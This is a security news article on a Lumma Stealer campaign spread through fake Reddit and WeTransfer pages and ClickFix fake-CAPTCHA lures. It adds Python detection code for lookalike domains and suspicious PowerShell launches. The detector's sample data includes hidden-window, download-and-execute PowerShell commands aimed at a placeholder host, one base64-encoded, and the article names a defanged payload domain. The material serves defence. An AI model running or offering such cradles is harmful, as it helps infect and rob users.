Hundreds of websites impersonating Reddit and WeTransfer spread Lumma Stealer


Date: 24/01/2025

Sekoia researcher crep1x discovered that attackers are currently operating roughly 1,000 web pages impersonating Reddit and WeTransfer. Visitors to these sites are tricked into downloading the Lumma Stealer infostealer.

All of the fake Reddit pages use the same social-engineering trick: each shows a discussion thread about a specific problem. In most cases the purported thread creator asks for help downloading a certain tool, and a 'Good Samaritan' replies, claiming to have uploaded the required software to WeTransfer and posting a link to it. To make the exchange look more credible, a third user thanks the 'Good Samaritan'.

Users who click the link land on a fake WeTransfer site that mimics the popular file-sharing service. Its "Download" button fetches the Lumma Stealer payload from weighcobbweo[.]top.

Fake Reddit

The addresses of the rogue sites consist of the name of the impersonated brand (e.g. Reddit) followed by random digits and symbols. Most of the fake sites use the .org and .net top-level domains.

The Sekoia analyst published a list of the pages used in the scam: 529 disguised as Reddit and 407 impersonating WeTransfer.
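The naming pattern above (brand name, then digits or symbols, mostly under .org and .net) is simple enough to turn into a first-pass filter for proxy logs or a defanged indicator list like the one the Sekoia analyst published. The script below is an added example written for this page, not code from Sekoia or Bleeping Computer. The allow-list of genuine Reddit and WeTransfer domains, the "last two labels" notion of a registrable domain, and the sample log lines (including every domain in them) are assumptions and constructed data, not indicators from the report.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Brands impersonated in the campaign, and the TLDs the report says most fakes used.
BRANDS = ("reddit", "wetransfer")
SUSPECT_TLDS = {"org", "net"}

# Genuine registrable domains for those brands. Assumption of this example
# (a defender's allow-list), not taken from the report.
LEGITIMATE = {"reddit.com", "redd.it", "wetransfer.com", "we.tl"}

# "<brand>" followed by one or more digits or hyphens and nothing else.
# Hyphen is the only "symbol" a DNS label can actually carry.
LOOKALIKE = re.compile(r"(?:%s)[0-9-]+" % "|".join(BRANDS))


def refang(indicator: str) -> str:
    """Undo common IOC defanging (hxxp, [.], (.)) so the URL can be parsed."""
    return indicator.replace("hxxp", "http").replace("[.]", ".").replace("(.)", ".")


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname: fine for .org/.net/.com, not for ccSLDs like .co.uk."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_domain(url: str) -> Optional[str]:
    """Return the registrable domain if it matches the campaign's naming pattern, else None."""
    try:
        host = urlsplit(url if "://" in url else "//" + url).hostname
    except ValueError:  # stray brackets that are not a [.] defang, etc.
        return None
    if not host:
        return None
    domain = registrable_domain(host)
    if domain in LEGITIMATE:
        return None
    label, _, tld = domain.rpartition(".")
    if tld not in SUSPECT_TLDS or not LOOKALIKE.fullmatch(label):
        return None
    return domain


def scan(lines):
    """Scan proxy-log or IOC-list lines; return flagged domains in first-seen order."""
    flagged = []
    for line in lines:
        for token in line.split():
            domain = lookalike_domain(refang(token))
            if domain and domain not in flagged:
                flagged.append(domain)
    return flagged


# Constructed sample lines for this example: not real log data, and none of these
# domains are indicators from the report.
SAMPLE_LINES = [
    "2025-01-24T10:01:02Z 10.0.0.5 GET https://www.reddit.com/r/sysadmin/ 200",
    "2025-01-24T10:03:17Z 10.0.0.5 GET hxxps://reddit-4817[.]org/r/help/ 200",
    "2025-01-24T10:03:41Z 10.0.0.5 GET hxxps://wetransfer77[.]net/download/ 200",
    "2025-01-24T10:05:00Z 10.0.0.9 GET https://wetransfer.com/ 200",
    "2025-01-24T10:06:30Z 10.0.0.9 GET https://reddit-fans.org/ 200",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LINES))
```

Note that the pattern deliberately requires only digits and hyphens after the brand name, so "reddit-fans.org" is not flagged; widening it to any suffix would catch more of this campaign but also a lot of legitimate fan and community sites, so keep a human in the loop before blocking.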

How many victims were lured to these fake resources remains unknown, but Bleeping Computer notes that such attacks can begin with malicious advertisements, SEO poisoning, malicious sites, or messages sent via social networks and instant messengers.

According to Netskope Threat Labs, attackers are also actively spreading Lumma Stealer through fake CAPTCHA pages. These attacks use the ClickFix technique (also tracked as ClearFake or OneDrive Pastejacking), which is currently popular among cybercriminals.

Victims are lured to rogue websites and talked into running malicious PowerShell commands themselves, thereby infecting their own systems by hand. In most cases the site asks the user to pass a fake CAPTCHA or "verification" step, supposedly to fix a browser issue or to join a channel.
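Because ClickFix relies on the victim pasting a command into the Windows Run dialog (Win+R), the resulting PowerShell process is typically a child of explorer.exe, usually with a hidden window, an execution-policy bypass, a download-and-execute cradle, or an -EncodedCommand wrapper. The detection below is an added example for this page, not code or indicators from Netskope or Sekoia: it scores Sysmon-style process-creation events on those traits. The regexes, the scoring threshold and the three sample events (using the reserved name example.invalid) are this example's own assumptions and constructed data.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Heuristic patterns for command lines a ClickFix lure tells the victim to paste.
# These regexes are this example's assumptions, not indicators from the article.
CRADLE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"iex|invoke-expression|mshta|curl)\b", re.I)
EVASION = re.compile(
    r"-w(?:indow(?:style)?)?\s+hidden|-nop\b|-noprofile\b|"
    r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode PowerShell's -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score one process-creation event (Sysmon Event ID 1 style field names)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if not image.endswith(("powershell.exe", "pwsh.exe", "mshta.exe")):
        return 0, reasons
    if parent.endswith("explorer.exe"):
        reasons.append("spawned by explorer.exe (Run dialog / pasted command)")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        cmd = cmd + " " + decoded  # inspect the decoded script as well
    if EVASION.search(cmd):
        reasons.append("hidden window or execution-policy bypass")
    if CRADLE.search(cmd):
        reasons.append("download cradle")
    return len(reasons), reasons


def alerts(events, threshold: int = 2):
    """Return (index, reasons) for every event scoring at or above the threshold."""
    out = []
    for i, event in enumerate(events):
        score, reasons = score_event(event)
        if score >= threshold:
            out.append((i, reasons))
    return out


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events for this example (not real telemetry).
SAMPLE_EVENTS = [
    {   # admin running a cmdlet from a terminal: benign, scores 1
        "Image": PS,
        "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
        "CommandLine": "powershell.exe -NoProfile -Command Get-Service",
    },
    {   # ClickFix-style: pasted into Win+R, hidden window, download-and-run cradle
        "Image": PS,
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/verify | iex"',
    },
    {   # the same lure with the script hidden behind -EncodedCommand
        "Image": PS,
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
                       + _encode("mshta https://example.invalid/a.hta"),
    },
]

if __name__ == "__main__":
    for index, why in alerts(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"][:60], why)
```

The explorer.exe parent on its own is not suspicious (launching PowerShell from the Start menu produces the same parent), which is why the example requires at least two traits before alerting; in a real pipeline you would also add the clipboard write or the browser as the originating process where your telemetry has it.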
